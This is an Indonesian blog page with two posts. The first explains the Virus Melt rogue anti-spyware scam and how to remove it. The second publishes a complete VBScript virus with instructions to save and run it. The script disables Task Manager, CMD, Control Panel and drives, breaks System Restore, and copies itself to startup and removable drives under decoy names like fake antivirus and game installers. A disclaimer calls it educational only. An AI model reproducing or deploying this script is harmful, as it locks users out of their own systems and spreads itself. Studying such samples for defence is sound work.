Custom Search
Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

Minggu, 22 Januari 2012

Cara Menghapus Virus Melt

Virus Melt spyware remover ,  aplikasi anti-spyware. Setelah terinstal, akan membanjiri sistem dengan pemberitahuan peringatan palsu tentang berbagai infeksi dan masalah keamanan melompat pengguna yang akan membeli versi lengkap Virus Melt untuk menghilangkan infeksi tersebut palsu. Tapi sebenarnya, Virus Melt adalah scam. 


Virus melt memasuki sistem dengan menggunakan virus trojan, dari situs berbahaya atau  pengguna yang men-download dan menginstal versi trial . Terlepas dari cara yang nakal ini memasuki sistem, tujuan utama tetap sama - untuk mempromosikan produk berguna dan mengumpulkan uang dari pengguna berpengalaman. Dalam rangka untuk mencapai tujuan itu, Virus melt melakukan scan sistem palsu dan laporan hasil palsu tentang masalah privasi dan keamanan atau kerentanan. Virus Melt ini kemudian diiklankan sebagai solusi terbaik dalam situasi saat ini. Namun, versi trial tidak mampu untuk menghapus infeksi, sehingga pengguna harus membeli salinan penuh jika ingin menghapus Virus Melt. Dan ini tidak lebih dari penipuan, karena  Virus melt adalah infeksi itu sendiri. Ini harus dihapus sesegera mungkin setelah dideteksi.

Sifat Virus Melt :
• Perubahan pengaturan browser. 
• Menunjukkan iklan komersial. 
• Menghubungkan sendiri ke internet. 
• Tetap tinggal di latar belakang.

Manual removal
 
hentikan proses :
 VMelt.exe SICKBOY.exe sld.exe SM.exe

Hapus registry values :
HKEY_CLASSES_ROOT \ CLSID \ {3F2BBC05-40DF-11D2-9455-00104BC936FF}
HKEY_CLASSES_ROOT \ VMelt.DocHostUIHandler 
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ 5.0 \ User Agent \ Pasang Platform "URVMLT []" 
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run "Virus Melt"

Unregister DLL:
 exec.dll gid.dll

Hapus file :
 VMelt.exe mscfg.ini SICKBOY.exe ANTIGEN.sys delfile.sys sld.exe sld.sys exec.dll SM.exe gid.dll fix.drv snl2w.sys fix.drv PE.sys Virus Melt.lnk Instructions.ini wrkdata . cfg

Tools yang diperlukan untuk memperbaiki ini :
Malwarebytes 'Anti-Malware( atau anda bisa menggunakan Anti-malware lainnya )

Solusi:
Download dan instal Malwarebytes Anti_Malware dan ikuti petunjuk pada layar untuk melakukan quick scan. Hasil scan akan memberikan daftar informasi yang terinfeksi, dari sana Anda dapat memilih dan menghapus item yang terinfeksi.
Diposting oleh di Tidak ada komentar:
Label: , ,

Rabu, 17 Agustus 2011

Contoh Script Virus Komputer

kali ini saya akan mengshare contoh script virus. lho kok script virus di share sih ? script virus ini saya sengaja di share agar kawan-kawan sekalian bisa mengetahui cara kerja virus dan cara mengatasinya. bukan hanya itu saja script ini saya share agar kawan-kawan juga mengetahui cara membuat virus ( hanya sebatas ilmu pengetahuan lho ) ok langsung aja berikut scriptnya.




On error resume next

Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner

set Regpen = CreateObject ("Wscript.Shell" )

set FSO = CreateObject ("Scripting. FileSystemObject ")

set Creator = FSO.CreateTextFile ("C:\Ternate. vbs", true)

Creator.WriteLine ("Msgbox ("& Chr (34) & "Salam Kenal dari Saya,

Mr.Dajjal :<" & chr (34)& ")")

Creator.Close



Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\NoRun" ,"1","REG_ DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \System\DisableC MD","1"," REG_DW ORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoFolderOption" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoDrives" ,"16","REG_ D WORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoSaveSettings" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"

Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr

entVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"

Regpen.Regwrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur

rentVersion\ Winlogon\ LegalNoticeCapti on", "THE Syaithan-X"

Regpen.RegWrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur

rentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR"



Set Copier = FSO.GetFile ("C:\Ternate. vbs")

Copier.Copy ("C:\Documents and Settings\All Users\Start

Menu\Programs\ Startup\Adobe. vbs")



FSO.CreateFolder ("C:\Program Files\Microsoft 0ffice\0ffice12" )

FSO.CreateFolder ("D:\Program" )

FSO.CreateFolder ("E:\Program" )

FSO.CreateFolder ("F:\Program" )

FSO.CreateFolder ("G:\Program" )

FSO.CreateFolder ("H:\Program" )

FSO.CreateFolder ("I:\Program" )

FSO.CreateFolder ("J:\Program" )

FSO.CreateFolder ("K:\Program" )



Set Deleter = FSO.GetFile ("C:\Windows\ System32\ Restore\rstrui. exe")

Deleter.Move ("C:\Program Files\Microsoft 0ffice\0ffice12\ rstrui.Gnamu" )



set Dupler = FSO.GetFile (WScript.ScriptFull Name)

Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\ Hantu.vbs" )

Dupler.Copy ("C:\Documents and Settings\All Users\Start

Menu\Programs\ Startup\Desktop. ini.vbs")

Dupler.Copy ("C:\Documents and Settings\All

Users\Desktop\ Dajjal_Antivirus .exe.vbs" )

Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")

Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")

Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )

Dupler.Copy ("F:\Program\ Ansav_SETUP. vbs")

Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )

Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )

Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")

Dupler.Copy ("J:\Program\ Project.vbs" )

Dupler.Copy ("K:\Program\ Hantu.vbs" )





Set Runner = WScript.CreateObjec t ("WScript.Shell" )

Runner.Run ("C:\Program Files\Microsoft 0ffice\0ffice12\ Hantu.vbs" )





  1. masukan script diatas kedalam notepad
  2. save dengan nama yang anda inginkan ( jangan lupa belangkang ditambahkan .exe )
  3. selesai


NB : saya tidakakan bertanggung jawab dengan segala kerusakan yang ditimbulkan. karena ini hanya untuk ilmu pengetahuan semata, terima kasih
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Komentar (Atom)